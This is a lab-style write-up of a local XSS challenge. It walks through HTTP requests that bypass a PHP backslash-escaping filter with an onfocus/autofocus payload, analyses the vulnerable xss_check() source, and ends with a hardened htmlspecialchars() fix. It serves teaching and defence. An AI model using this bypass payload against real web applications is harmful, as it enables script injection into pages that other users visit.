Exploitation
To protect the application, the author indicates that the " character is now escaped:
The " character is indeed processed: it is escaped by inserting a \ character in front of it:
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%22&submit=Envoyer
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\"" placeholder="keyword" required>
</div>
The bypass that seems most obvious to me to try is to also insert a \ character, in order to escape the escaping:
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%5C%22&submit=Envoyer
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\"" placeholder="keyword" required>
</div>
This seems to work:
All that is left is to adapt my autofocus-based payload whatever\" onfocus=alert(1) autofocus x=\" (note that I also remove the quotes around the JavaScript code):
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer
HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
</div>
Source code analysis
The xss_check() function processes the " character, which is escaped by adding a \ in front of each occurrence. The keyword is then displayed as the value of the HTML value attribute:
<?php
if (isset ($_POST['submit']) && isset ($_POST['search'])) {
$keyword = $_POST['search'];
}
function xss_check($data) {
$input = str_replace('"', '\"', $data);
$input = urldecode($input);
return $input;
}
?>
<div class="row">
<form name="forgetPass" method="post">
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="<?php if (isset ($keyword) && !empty ($keyword)){ echo xss_check($keyword); }?>" placeholder="keyword" required>
</div>
<div class="form-group col-md-2">
<input type="submit" class="form-control btn btn-default" name="submit">
</div>
</form>
</div>
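The escaping above fails for a structural reason, not because of the particular payload: backslash-escaping is a string-literal convention (C, JavaScript, PHP), while an HTML attribute value simply ends at the next raw " character, so the backslash is inert there. The following is an added example, not part of the original write-up or of the challenge code: it places the page's xss_check() beside a hardened replacement (the helper name attr_encode is an assumption) that HTML-entity-encodes the value with htmlspecialchars() and drops the urldecode() step, since PHP has already decoded the form body into $_POST and decoding after escaping can reintroduce characters that were just neutralised.

```php
<?php
// Added example, not the challenge's own code: the page's xss_check()
// beside a hardened replacement for the same output context (an HTML
// attribute value delimited by double quotes).

// The page's vulnerable helper, reproduced unchanged for comparison.
function xss_check($data) {
    $input = str_replace('"', '\"', $data);
    $input = urldecode($input);
    return $input;
}

// Hardened helper (assumed name). ENT_QUOTES encodes both ' and ", ENT_HTML5
// selects HTML5 entity tables, ENT_SUBSTITUTE replaces invalid UTF-8 instead
// of returning an empty string. No decode step is applied after encoding.
function attr_encode(string $data): string {
    return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a plain keyword with a quote, then the page's final
// payload exactly as it reaches $_POST['search'] after PHP's form decoding.
$inputs = [
    'whatever"',
    'whatever\\" onfocus=alert(1) autofocus x=\\"',
];

foreach ($inputs as $keyword) {
    echo "input:      " . $keyword . "\n";
    // Vulnerable: the raw " survives, so the attribute closes early.
    echo "vulnerable: value=\"" . xss_check($keyword) . "\"\n";
    // Hardened: every " becomes &quot; and the whole input stays inside value.
    echo "hardened:   value=\"" . attr_encode($keyword) . "\"\n\n";
}
```

Run with `php` on the command line: for the second input the vulnerable line reproduces the attribute-breaking markup shown in the last response above, while the hardened line renders as value="whatever\&quot; onfocus=alert(1) autofocus x=\&quot;", which the browser displays as literal text in the field. The same rule applies to any other output context: choose the encoder for the context the data lands in (attribute, element body, JavaScript string, URL), rather than a generic character replacement.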